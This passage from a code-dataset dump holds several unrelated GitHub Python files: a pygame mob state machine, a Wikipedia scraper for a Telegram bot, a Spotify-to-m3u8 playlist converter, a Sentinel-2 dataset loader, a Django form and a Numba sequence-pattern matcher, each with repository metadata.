{"api_name": "random.randint", "line_number": 179, "usage_type": "call"}, {"api_name": "math.copysign", "line_number": 189, "usage_type": "call"}, {"api_name": "math.copysign", "line_number": 193, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 287, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 307, "usage_type": "call"}, {"api_name": "pygame.Surface", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "74131144165", "text": "import requests\nfrom bs4 import BeautifulSoup\n\nclass WikiSpider:\n \"\"\"\n 基于 requests 的简单维基百科爬虫\n \"\"\"\n def __init__(self, is_proxy=False):\n \"\"\"\n 初始化 requests 的各种设置\n :param is_proxy: 是否使用代理\n \"\"\"\n \n # 歧义页面\n self.ambi_board = {}\n # requests session\n self.session = requests.Session()\n # requests proxy\n self.proxies = None\n self.request_kwargs = None\n if is_proxy:\n self.proxies = {\n \"http\": \"http://127.0.0.1:1080\",\n \"https\": \"http://127.0.0.1:1080\",\n }\n\n self.request_kwargs = {\n \"proxy_url\": \"http://127.0.0.1:1080\"\n }\n # requests header\n self.wiki_headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Language': 
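The mobstate.py record that ends above drives each mob through a dictionary of state objects, with flip_state handing a persistence dict to the next state. The skeleton below isolates that pattern; the class names are illustrative and the sketch assumes nothing beyond plain Python.

class State:
    """One node of the state machine; mirrors the MobState contract."""
    def __init__(self):
        self.done = {}           # next-state name -> bool; set True to request a switch
        self.persistence = {}    # data handed over on every transition

    def start_up(self, persistence):
        self.persistence = persistence

    def update(self, dt):
        pass

class StateMachine:
    def __init__(self, states, initial):
        self.states = states
        self.state = states[initial]

    def flip_state(self, name):
        # Carry the persistence dict across the transition, as flip_state does above.
        self.state.done[name] = False
        persistent = self.state.persistence
        self.state = self.states[name]
        self.state.start_up(persistent)

    def update(self, dt):
        for name, ready in self.state.done.items():
            if ready:
                self.flip_state(name)
        self.state.update(dt)

Keeping a per-state done dict rather than returning a single next-state value is what lets several transition conditions (death, getting hit, player detection) be armed independently inside events().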
'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7,de;q=0.6',\n 'Accept-Encoding': 'gzip, deflate',\n 'DNT': '1',\n 'Connection': 'keep-alive',\n 'Upgrade-Insecure-Requests': '1'\n }\n\n def tg_wiki(self, chat_id, kw):\n \"\"\"\n 用于 telegram 的查询入口\n \"\"\"\n try:\n # 尝试把 kw 当数字处理\n item_num = int(kw)\n # 如果确定是数字,则前往歧义页面进行处理\n brief = self.wiki_by_ambi_num(chat_id, item_num)\n print(brief[:120] + '...\\n')\n # bot.send_message(chat_id=chat_id, text=brief)\n return brief \n \n except ValueError:\n pass\n\n try:\n brief = self.wiki(chat_id, kw)\n if not brief:\n brief = '什么也没找到'\n print(brief[:120] + '...\\n')\n # bot.send_message(chat_id=chat_id, text=brief)\n return brief\n except IndexError:\n # bot.send_message(chat_id=chat_id, text='请输入文字')\n return '请输入文字'\n except Exception as e:\n print(e)\n\n def wiki(self, chat_id, kw):\n \"\"\"\n 依靠关键字查询主入口\n :param chat_id(int): Telegram 的对话id\n :param kw(str): 关键字 \n \"\"\"\n print('正在查询: ', kw)\n\n # 如果输入为空\n if not kw or not kw.strip():\n return '什么都没有找到'\n\n # url 前缀\n prefix = 'https://zh.wikipedia.org/wiki/'\n url = prefix + kw\n\n # 清空当前 chat 在 ambi_board 上的数据\n if chat_id in self.ambi_board:\n self.ambi_board.pop(chat_id)\n # 返回以网址查询的结果\n return self.wiki_by_url(chat_id, url)\n\n def wiki_by_ambi_num(self, chat_id, num):\n \"\"\"\n 从歧义页面中选择\n :param chat_id(int): Telegram 的对话 id\n :param num(int): 选择的序号\n \"\"\"\n url = None\n try:\n # 尝试从 ambi_board 中选取目标项目的 url\n url = self.ambi_board[chat_id][num]['url']\n except (KeyError, IndexError):\n return '输入错误,重新选择'\n if url:\n return self.wiki_by_url(chat_id, url)\n else:\n return '输入错误,重新选择'\n\n\n def wiki_by_url(self, chat_id, url):\n \"\"\"\n 对 url 发起请求,并进行内容分析处理\n :param chat_id(int): Telegram 的对话 id\n :param url(str): 所要请求的 url\n \"\"\"\n # get 请求\n r = self.session.get(url, headers=self.wiki_headers, proxies=self.proxies)\n url = r.url \n # 用 BeautifulSoup 进行处理\n soup = BeautifulSoup(r.text, 'lxml')\n\n # 歧义页面\n try:\n # 如果页面中存在歧义页面的 disambigbox 元素\n disambigbox = soup.select('#disambigbox')\n if disambigbox:\n # 提取选项列表,保存到 self.ambi_board \n ambi_list = soup.select('.mw-parser-output > ul > li')\n self.ambi_board[chat_id] = {}\n\n i = 0\n # print(ambi_list)\n for item in ambi_list:\n # item = ambi_list[i]\n # item_title = item.find_all('a')[0]['title']\n tag_a = item.find('a')\n if 'class' in tag_a.attrs and 'new' in tag_a['class']:\n continue\n item_url = 'https://zh.wikipedia.org' + tag_a['href']\n item_description = item.get_text()\n # 提取\n self.ambi_board[chat_id][i] = {\n 'url': item_url,\n 'description': item_description,\n }\n i += 1\n \n # 生成 ambi_str \n ambi_str = disambigbox[0].parent.find('p').get_text() + '\\n'\n for k, v in self.ambi_board[chat_id].items():\n ambi_str += '[{}] {}\\n'.format(k, v['description'])\n ambi_str += '输入 /wiki@wikiboy_bot+数字 选择所要查看的条目'\n return ambi_str\n except IndexError:\n return '处理内容发生错误'\n except Exception as e:\n print(e)\n return '什么都没有找到'\n\n\n # 正常页面\n brief = '' # 内容简要\n title = '' # 标题\n target_p = None # 目标的 p 元素\n try:\n title = soup.h1.get_text() + '\\n' \n main_content = soup.select('.mw-parser-output > p')\n if main_content:\n target_p = main_content[0]\n if target_p.select('span[class=\"latitude\"]') or len(target_p.get_text().strip()) < 5:\n target_p = target_p.find_next_sibling('p')\n brief = target_p.get_text()\n except Exception as e:\n print(e)\n\n # 如果没有找到 main_content 进入搜索页面\n if len(soup.select('.noarticletext')) > 0:\n try:\n search_url_prefix = 'https://zh.wikipedia.org/wiki/Special:%E6%90%9C%E7%B4%A2/'\n search_resp = 
requests.get(search_url_prefix + title[:-1], headers=self.wiki_headers, proxies=self.proxies)\n search_soup = BeautifulSoup(search_resp.text, 'lxml')\n search_results = search_soup.select('.mw-search-results > li > div > a')\n\n # 处理搜索结果\n # 清空歧义页面的数据\n self.ambi_board[chat_id] = {}\n ambi_str = '没有直接相关的结果,但我尝试做了搜索:'\n if len(search_results) == 0:\n return '什么都没有找到'\n for i in range(len(search_results)):\n res = search_results[i]\n item_url = 'https://zh.wikipedia.org' + res['href']\n item_description = res.get_text()\n self.ambi_board[chat_id][i] = {\n 'url': item_url,\n 'description': item_description,\n }\n ambi_str += '\\n[{}] {}'.format(i, item_description)\n ambi_str += '\\n输入 /wiki@wikiboy_bot+数字 选择所要查看的条目'\n return ambi_str\n except Exception as e:\n print(e)\n return '什么都没有找到'\n\n if not brief:\n return '什么都没有找到'\n\n # 移除所有的方括号\n brief = self.remove_brackets(brief, '[]')\n return title + brief + '\\n' + url\n\n\n def remove_brackets(self, text, bracket_pair):\n \"\"\"\n 移除字符串 text 当中的某类括号,以及括号内的内容\n (没用正则写挺蠢的)\n \"\"\"\n left = bracket_pair[0]\n right = bracket_pair[1]\n depth = 0\n left_marks = []\n right_marks = []\n for i in range(len(text)):\n if text[i] == left:\n if depth == 0:\n left_marks.append(i)\n depth += 1\n if text[i] == right:\n depth -= 1\n if depth == 0:\n right_marks.append(i)\n if depth != 0 or len(left_marks) != len(right_marks):\n return text\n left_marks.append(len(text))\n right_marks.insert(0, -1)\n new_text = ''\n for i in range(len(left_marks)):\n new_text += text[right_marks[i] + 1: left_marks[i]]\n return new_text", "repo_name": "lvix/wikiboy", "sub_path": "wiki_spider.py", "file_name": "wiki_spider.py", "file_ext": "py", "file_size_in_byte": 8849, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 120, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 180, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 181, "usage_type": "call"}]} +{"seq_id": "15167579655", "text": "import os\nimport argparse\nfrom spotify.client import get_spotify_client\nfrom spotify.playlist import get_tracks_from_spotify_playlist\nfrom utils.text_processing import normalize_text\n\ndef create_m3u8_file(tracks, music_folder, output_file):\n \"\"\"Creates an m3u8 playlist file from a list of track names.\n \n Args:\n tracks (list): A list of track dictionaries.\n music_folder (str): Path to the folder containing the music files.\n output_file (str): Path to the output m3u8 file.\n \n Returns:\n None\n \"\"\"\n missing_tracks = []\n \n with open(output_file, 'w', encoding='utf-8') as f:\n f.write(\"#EXTM3U\\n\")\n for track in tracks:\n track_found = False\n for root, dirs, files in os.walk(music_folder):\n for file in files:\n normalized_file = normalize_text(file)\n if track['normalized_artist'] in normalized_file and track['normalized_title'] in normalized_file:\n f.write(os.path.join(root, file) + \"\\n\")\n track_found = True\n break\n if not track_found:\n missing_tracks.append(track['artist_title'])\n \n if missing_tracks:\n print(\"The following tracks were not found in your music library and have not been added to the playlist:\")\n for track in missing_tracks:\n print(f\"- {track}\")\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Convert Spotify playlists to m3u8 format.\")\n parser.add_argument(\"playlist_file\", help=\"Text 
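The wiki_spider.py record above closes with remove_brackets, which its own comment admits is clumsy for avoiding a regex. For balanced, possibly nested [...] spans — Wikipedia citation markers are typically flat, e.g. [1] — a compiled pattern applied until the text stops changing is a plausible drop-in; behavior may differ slightly from the original on unbalanced input.

import re

_BRACKET_RE = re.compile(r'\[[^\[\]]*\]')

def remove_brackets(text: str) -> str:
    """Strip [...] spans, peeling nested pairs from the inside out."""
    prev = None
    while prev != text:
        prev, text = text, _BRACKET_RE.sub('', text)
    return text

For the flat citation markers the spider actually encounters, the loop runs exactly one substitution pass.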
file containing the Spotify playlist URLs or IDs, one per line.\")\n parser.add_argument(\"music_folder\", help=\"Path to the folder containing the music files.\")\n parser.add_argument(\"output_dir\", help=\"Directory to save the output m3u8 files.\")\n args = parser.parse_args()\n\n spotify = get_spotify_client()\n\n with open(args.playlist_file, 'r') as file:\n playlist_ids = [line.strip() for line in file]\n\n for playlist_id in playlist_ids:\n tracks = get_tracks_from_spotify_playlist(playlist_id)\n if not tracks:\n continue\n\n # Fetch the playlist name for the output file\n playlist_info = spotify.playlist(playlist_id)\n playlist_name = playlist_info['name']\n output_file = os.path.join(args.output_dir, f\"{playlist_name}.m3u8\")\n\n print(f\"Processing playlist: {playlist_name}\")\n\n create_m3u8_file(tracks, args.music_folder, output_file)\n print(f\"Playlist has been saved to {output_file}\")\n\nif __name__ == \"__main__\":\n main()", "repo_name": "MichelleAppel/SpotifyToM3U8", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2615, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.walk", "line_number": 24, "usage_type": "call"}, {"api_name": "utils.text_processing.normalize_text", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 40, "usage_type": "call"}, {"api_name": "spotify.client", "line_number": 46, "usage_type": "name"}, {"api_name": "spotify.client.get_spotify_client", "line_number": 46, "usage_type": "call"}, {"api_name": "spotify.playlist.get_tracks_from_spotify_playlist", "line_number": 52, "usage_type": "call"}, {"api_name": "spotify.client.playlist", "line_number": 57, "usage_type": "call"}, {"api_name": "spotify.client", "line_number": 57, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}]} +{"seq_id": "4855677162", "text": "\"\"\"A single image dataset for a specific satellite and specific month.\"\"\"\n\nimport os\nfrom pathlib import Path\nfrom typing import Sequence, Optional, Callable, Dict, Any\nimport warnings\n\nimport fsspec\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport rasterio\nfrom rasterio.io import MemoryFile\nimport torch\nfrom torch import Tensor\nfrom torch.utils.data import Dataset, DataLoader\n\n# Our rasters contain no geolocation info, so silence this warning from rasterio\nwarnings.filterwarnings(\"ignore\", category=rasterio.errors.NotGeoreferencedWarning)\n\n\ndef load_raster(file_url: str) -> Tensor:\n \"\"\"Returns the data as tensor.\"\"\"\n # this is for local testing only ---\n # S2_IMG_DIM = (11, 256, 256)\n # if not os.path.exists(file_url):\n # array = np.random.randn(S2_IMG_DIM)\n # --- end local test ---\n storage_options = {'anon': True}\n with fsspec.open(file_url, **storage_options).open() as f:\n raw_bytes = f.read()\n # Save bytes to array\n with MemoryFile(raw_bytes) as memfile:\n with memfile.open() as buffer:\n array = buffer.read()\n if array.dtype == np.uint16:\n array = array.astype(np.float)\n return torch.tensor(array, dtype=torch.float32)\n\n\nclass Sentinel2(Dataset):\n \"\"\"Sentinel-2 Dataset.\n \n Sentinel-2 (S2) is a high-resolution imaging mission that monitors 
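In the SpotifyToM3U8 main.py above, create_m3u8_file re-walks the entire music folder for every track, so disk traversal dominates on large libraries. One possible refactor walks the tree once and matches against an in-memory index; index_music_folder and find_track are hypothetical helpers, while normalize_text is the same utility the project already imports.

import os
from utils.text_processing import normalize_text  # same helper main.py already imports

def index_music_folder(music_folder):
    """Walk the library once, mapping each normalized filename to its full path."""
    index = {}
    for root, _dirs, files in os.walk(music_folder):
        for name in files:
            index[normalize_text(name)] = os.path.join(root, name)
    return index

def find_track(index, track):
    """Return the first indexed path containing both artist and title substrings."""
    for normalized_name, path in index.items():
        if (track['normalized_artist'] in normalized_name
                and track['normalized_title'] in normalized_name):
            return path
    return None

Matching is still substring-based per track, but the filesystem is touched once per playlist run instead of once per track.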
vegetation,\n soil, water cover, inland waterways, and coastal areas. S2 satellites have a\n Multispectral Instrument (MSI) on board that collects data in the visible,\n near-infrared, and short-wave infrared portions of the electromagnetic spectrum.\n Sentinel-2 measures spectral bands that range from 400 to 2400 nanometers.\n Sentinel-2 has a 6-day revisit orbit, which means that it returns to the same \n area about five times per month. The best image for each month is selected from \n the S2 data.\n\n The following 11 bands are provided for each S2 image:\n B2, B3, B4, B5, B6, B7, B8, B8A, B11, B12, and CLP (a cloud probability layer).\n See the `Sentinel-2 guide `_ for a description of each band.\n\n The CLP band — cloud probability — is provided because S2 cannot penetrate clouds.\n The cloud probability layer has values from 0-100, indicating the percentage\n probability of cloud cover for that pixel. In some images, this layer may have\n a value of 255, which indicates that the layer has been obscured due to excessive\n noise.\n\n For information on the satellite data and its sources, check out the competiton `About Page `_.\n \"\"\"\n\n all_bands = [\n \"B2\",\n \"B3\",\n \"B4\",\n \"B5\",\n \"B6\",\n \"B7\",\n \"B8\",\n \"B8A\",\n \"B11\",\n \"B12\",\n \"CLP\"\n ]\n\n month_map = {\n \"september\": \"00\",\n \"october\": \"01\",\n \"november\": \"02\",\n \"december\": \"03\",\n \"january\": \"04\",\n \"february\": \"05\",\n \"march\": \"06\",\n \"april\": \"07\",\n \"may\": \"08\",\n \"june\": \"09\",\n \"july\": \"10\",\n \"august\": \"11\"\n }\n\n # Setup S3 URLs and folder locations within the S3 bucket\n # S3_URL = \"s3://drivendata-competition-biomassters-public-us\"\n S3_URL = \"/datasets/biomassters\"\n metadata_file = \"/notebooks/data/metadata_parquet/features_metadata_slim.parquet\"\n \n def __init__(self, \n metadata_file: str = \"\",\n data_url: str = \"\",\n bands: Sequence[str] = [], \n month: str =\"april\",\n train: bool = True, \n transform: Optional[Callable[[Dict[str, Any]], Dict[str, Any]]] = None, \n target_transform: Optional[Callable[[Dict[str, Any]], Dict[str, Any]]] = None\n ) -> None:\n \"\"\" Initialize a new instance of the Sentinel-2 Dataset.\n Args:\n \"\"\"\n if not metadata_file:\n metadata_file = self.metadata_file\n if not os.path.exists(metadata_file):\n raise FileNotFoundError(f\"File {metadata_file} not found! \"\n \"Please check the path and make sure the file exists.\"\n )\n # Data URL resolution\n if not data_url:\n data_url = self.S3_URL\n \n self.bands = bands if bands else self.all_bands\n self.month = month\n self.train = train\n self.transform = transform\n self.target_transform = target_transform\n \n if self.train:\n self.features_dir = data_url + \"/train_features\"\n self.targets_dir = data_url + \"/train_agbm\"\n else:\n self.features_dir = data_url + \"/test_features\"\n self.targets_dir = \"\"\n\n\n if metadata_file.endswith(\".parquet\"):\n metadata_df = pd.read_parquet(metadata_file)\n elif metadata_file.endswith(\".csv\"):\n metadata_df = pd.read_csv(metadata_file)\n else:\n raise Exception(f\"Unsupported format for metadata file: {metadata_file}. 
\"\n \"Only CSV and Parquet format files are supported.\")\n\n self.month_id = self.month_map[month]\n\n if self.train:\n self.chip_ids = metadata_df[metadata_df.split == \"train\"].chip_id.unique()\n else:\n self.chip_ids = metadata_df[metadata_df.split == \"test\"].chip_id.unique()\n\n def __len__(self):\n \"\"\"Return the length of the dataset.\"\"\"\n return len(self.chip_ids)\n\n def __getitem__(self, idx):\n \"\"\"Return a single (image, label) corresponding to idx.\"\"\"\n # Input image\n img_path = self.features_dir + f\"/{self.chip_ids[idx]}_S2_{self.month_id}.tif\"\n img_data = load_raster(img_path)[:10] # only first 10 channels, leave out cloud coverage channel\n\n if self.transform is not None:\n img_data = self.transform(img_data)\n\n # Target image\n target_data = None\n if self.train:\n target_path = self.targets_dir + f\"/{self.chip_ids[idx]}_agbm.tif\"\n target_data = load_raster(target_path)\n if self.target_transform is not None:\n target_data = self.target_transform(target_data)\n\n return {'image': img_data,\n 'target': target_data,\n 'chip_id': self.chip_ids[idx]}\n\n def plot(\n self,\n sample: Dict[str, Any],\n show_titles: bool = True,\n suptitle: Optional[str] = None,\n ) -> plt.Figure:\n \"\"\"Plot a sample from the dataset.\n Args:\n sample: a sample returned by :meth:`RasterDataset.__getitem__`\n show_titles: flag indicating whether to show titles above each panel\n suptitle: optional string to use as a suptitle\n Returns:\n a matplotlib Figure with the rendered sample\n Raises:\n ValueError: if the RGB bands are not included in ``self.bands``\n .. versionchanged:: 0.3\n Method now takes a sample dict, not a Tensor. Additionally, possible to\n show subplot titles and/or use a custom suptitle.\n \"\"\"\n rgb_indices = []\n for band in self.RGB_BANDS:\n if band in self.bands:\n rgb_indices.append(self.bands.index(band))\n else:\n raise ValueError(\"Dataset doesn't contain some of the RGB bands\")\n\n image = sample[\"image\"][rgb_indices].permute(1, 2, 0)\n image = torch.clamp(image / 2000, min=0, max=1)\n\n fig, ax = plt.subplots(1, 1, figsize=(4, 4))\n\n ax.imshow(image)\n ax.axis(\"off\")\n\n if show_titles:\n ax.set_title(\"Image\")\n\n if suptitle is not None:\n plt.suptitle(suptitle)\n\n return ", "repo_name": "goopyflux/BioMassters", "sub_path": "src/biomasstry/datasets/sentinel2.py", "file_name": "sentinel2.py", "file_ext": "py", "file_size_in_byte": 7822, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 19, "usage_type": "call"}, {"api_name": "rasterio.errors", "line_number": 19, "usage_type": "attribute"}, {"api_name": "fsspec.open", "line_number": 30, "usage_type": "call"}, {"api_name": "rasterio.io.MemoryFile", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint16", "line_number": 36, "usage_type": "attribute"}, {"api_name": "numpy.float", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 106, "usage_type": "name"}, {"api_name": 
"typing.Dict", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 106, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 114, "usage_type": "call"}, {"api_name": "os.path", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pandas.read_parquet", "line_number": 137, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 178, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 180, "usage_type": "name"}, {"api_name": "torch.clamp", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.suptitle", "line_number": 214, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 214, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 181, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}]} +{"seq_id": "72165695206", "text": "from django import forms\nfrom .models import Post\n\nclass PostModelForm(forms.ModelForm):\n content = forms.CharField(label='',\n widget=forms.Textarea(attrs={'placeholder':'Whats are you thinking?', 'class':'form-control form-control-lg mb-3'}\n ))\n class Meta:\n model = Post\n fields = [\n 'content',\n ]\n\n def clean_content(self,*args, **kwargs):\n content = self.cleaned_data.get(\"content\")\n if content == \"\":\n raise forms.ValidationError(\"Field cannot be empty\")\n return content\n\n", "repo_name": "georgianamit/CodeColeo", "sub_path": "src/posts/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 588, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.forms.ModelForm", "line_number": 4, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 4, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 5, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 5, "usage_type": "name"}, {"api_name": "django.forms.Textarea", "line_number": 6, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 6, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 9, "usage_type": "name"}, {"api_name": "django.forms.ValidationError", "line_number": 17, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "74416496165", "text": "\"\"\"\nThis module implements the matching routine, by JIT compiling the code \nfor each input separately using Numba. \n\"\"\"\n\nimport inspect\nimport sys\nfrom typing import Callable, Union\n\nimport awkward as ak\nimport numba as nb\nimport numpy as np\nfrom numba.typed import List\nimport awkward.layout as ak_layout\n\nfrom . 
import codegen as cg\nfrom .primitives import *\n\n__all__ = [\"match_pattern\", \"extract_pattern\"]\n\n\n# -----------------------------------------------------------\n# matching sequences using the given pattern\n# -----------------------------------------------------------\n\n\n@nb.experimental.jitclass\nclass PatternInfo:\n length: int\n idx_start: int\n idx_end: int\n event_min_counts: nb.int64[:] # type:ignore\n event_max_counts: nb.int64[:] # type:ignore\n match_seq_start: bool\n match_seq_end: bool\n match_all: bool\n allow_overlaps: bool\n\n def __init__(\n self,\n length: int,\n idx_start: int,\n idx_end: int,\n event_min_counts: np.ndarray,\n event_max_counts: np.ndarray,\n match_seq_start: bool,\n match_seq_end: bool,\n match_all: bool,\n allow_overlaps: bool,\n ):\n self.length = length\n self.idx_start = idx_start\n self.idx_end = idx_end\n self.event_min_counts = event_min_counts\n self.event_max_counts = event_max_counts\n self.match_seq_start = match_seq_start\n self.match_seq_end = match_seq_end\n self.match_all = match_all\n self.allow_overlaps = allow_overlaps\n\n\ndef type_getitem(typ):\n t = typ.type.getitem_at_check(typ)(typ, nb.int64)\n return t.return_type\n\n\n_compiled_registry = {}\n\n\ndef match_pattern(pat: SeqPattern, sequences: ak.Array) -> ak.Array:\n \"\"\"Wrapper that jit compiles numba functions to match the given pattern, and returns a list of\n identifiers for the matched sequences.\n \"\"\"\n pat_info = PatternInfo(\n len(pat.event_patterns),\n pat.idx_start_event if pat.idx_start_event else -1,\n pat.idx_end_event if pat.idx_end_event else -1,\n np.asarray([p.min_count for p in pat.event_patterns], dtype=np.int64),\n np.asarray([p.max_count for p in pat.event_patterns], dtype=np.int64),\n pat.match_seq_start,\n pat.match_seq_end,\n pat.match_all,\n pat.allow_overlaps,\n )\n\n cache_id = pat.pattern_str + (pat.code if pat.code is not None else \"\")\n # check if code exists as a cached file, else generate and store it\n if not cg.present_in_cache(cache_id):\n list_fns = cg.generate_match_fns(pat)\n\n code_str = \"\"\n for _imp in (\n \"import numba as nb\",\n \"import numpy as np\",\n \"import awkward as ak\",\n \"from numba.typed import List\",\n ):\n code_str += _imp + \"\\n\"\n\n for _func in list_fns:\n code_str += \"\\n\" + cg.ast_to_code(_func) + \"\\n\"\n code_str += \"\\n\" + cg.seq_post_filter_fn(pat) + \"\\n\"\n code_str += \"\\n\" + inspect.getsource(match_sequence_here) + \"\\n\"\n cg.write_to_cache(cache_id, code_str)\n\n jit_mod = cg.import_from_cache(cache_id)\n\n typ_seq_item = type_getitem(nb.typeof(sequences))\n typ_events_item = type_getitem(nb.typeof(sequences[\"events\"]))\n typ_np_array = nb.typeof(np.zeros(5, np.int64))\n typ_inputs = (\n nb.typeof(pat_info),\n nb.typeof(sequences),\n nb.types.FunctionType(nb.bool_(typ_seq_item)),\n nb.types.FunctionType(nb.bool_(typ_seq_item, typ_np_array)),\n nb.types.FunctionType(\n nb.bool_(\n nb.typeof(pat_info),\n nb.int64,\n typ_events_item,\n nb.int64,\n typ_np_array,\n typ_np_array,\n )\n ),\n )\n if typ_inputs in _compiled_registry:\n fn = _compiled_registry[typ_inputs]\n else:\n fn = nb.jit(\n typ_inputs, nopython=True, locals={\"pos\": nb.int64, \"pat_pos\": nb.int64}\n )(_match_pattern)\n _compiled_registry[typ_inputs] = fn\n\n res = fn(\n pat_info,\n sequences,\n jit_mod.match_seq_pre,\n jit_mod.match_seq_post,\n jit_mod.match_sequence_here,\n ) # type: tuple[list[np.ndarray], ...]\n\n list_match_seq_ids, list_match_indices, list_match_counts = res\n match_seq_ids = 
np.concatenate(list_match_seq_ids)\n match_indices = np.concatenate(list_match_indices)\n match_counts = np.concatenate(list_match_counts)\n\n # filter down to legit matches\n valid_indices = match_seq_ids >= 0\n match_seq_ids = match_seq_ids[valid_indices]\n match_indices = match_indices[valid_indices]\n match_counts = match_counts[valid_indices]\n\n return ak.Array(\n {\n \"seq_id\": match_seq_ids,\n \"evt_indices\": match_indices,\n \"evt_counts\": match_counts,\n }\n )\n\n\ndef _match_pattern(\n pat: \"PatternInfo\",\n sequences: \"ak.Array\",\n match_seq_pre: Callable[..., bool],\n match_seq_post: Callable[..., bool],\n match_seq_here: Callable[..., bool],\n) -> tuple[list[np.ndarray], ...]:\n \"\"\"Match the pattern against the sequences.\n\n NOTE: This routine is jit compiled with Numba. We handle jitting it manually by specifying the\n inputs, since Numba produces two specializations otherwise - one where the input list of sequences\n is nullable. I am not sure why.\n \"\"\"\n num_sequences = len(sequences)\n\n # List of numpy arrays to output.\n # A cleaner option would be to output a list of structs instead but we want to keep allocations to\n # a minimum. So, initialize numpy arrays to record it, and when we run out of space, create a new\n # numpy array and append it to the list.\n # Another alternative would be to resize the array each time we run out of space, but numba copies\n # the array elements one at a time which is slow. Numpy likely just copies the buffer directly.\n list_match_seq_ids = List()\n list_match_indices = List()\n list_match_counts = List()\n\n def _gen_arrays():\n list_match_seq_ids.append(np.full(num_sequences, -1, dtype=np.int64))\n list_match_indices.append(np.zeros((num_sequences, pat.length), dtype=np.int64))\n list_match_counts.append(np.zeros((num_sequences, pat.length), dtype=np.int64))\n return (\n list_match_seq_ids[-1],\n list_match_indices[-1],\n list_match_counts[-1],\n )\n\n match_seq_ids, match_indices, match_counts = _gen_arrays()\n out_idx = 0 # index into the current set of match arrays, resets each time we run out of space\n\n for seq_id in range(num_sequences):\n seq = sequences[seq_id]\n\n # filter against the sequence properties\n if not match_seq_pre(seq): # type: ignore\n continue\n\n events = seq[\"events\"] # type:ignore\n num_events = len(events)\n\n # NOTE: this variable isn't mutated. Numba creates extra specializations, treating it as a literal in\n # addition to int64. 
We just want to avoid it.\n pat_pos = 0\n pos = 0\n start_before = 1 if pat.match_seq_start else num_events\n # NOTE: MAKE SURE THE LOOP VARIABLE IS INCREMENTED\n while pos < start_before:\n if (\n match_seq_here(\n pat,\n pat_pos,\n events,\n pos,\n match_indices[out_idx],\n match_counts[out_idx],\n )\n and match_seq_post(seq, match_indices[out_idx])\n ):\n if pat.allow_overlaps:\n # start matching from the next event in the sequence\n pos += 1\n elif pat.idx_end >= 0:\n # start matching after the current match ends\n pos = (\n match_indices[out_idx][pat.idx_end]\n + match_counts[out_idx][pat.idx_end]\n )\n else:\n # subsequences go until the end by default\n pos = num_events\n\n # fill in the output arrays\n\n # match_indices and match_counts arrays were already mutated while matching\n match_seq_ids[out_idx] = seq_id\n # update the running output index\n out_idx += 1\n # create more space if needed\n if out_idx == num_sequences:\n match_seq_ids, match_indices, match_counts = _gen_arrays()\n out_idx = 0\n\n # conclude if we need to match only the first occurrence\n if not pat.match_all:\n break\n\n else:\n pos += 1\n\n return (list_match_seq_ids, list_match_indices, 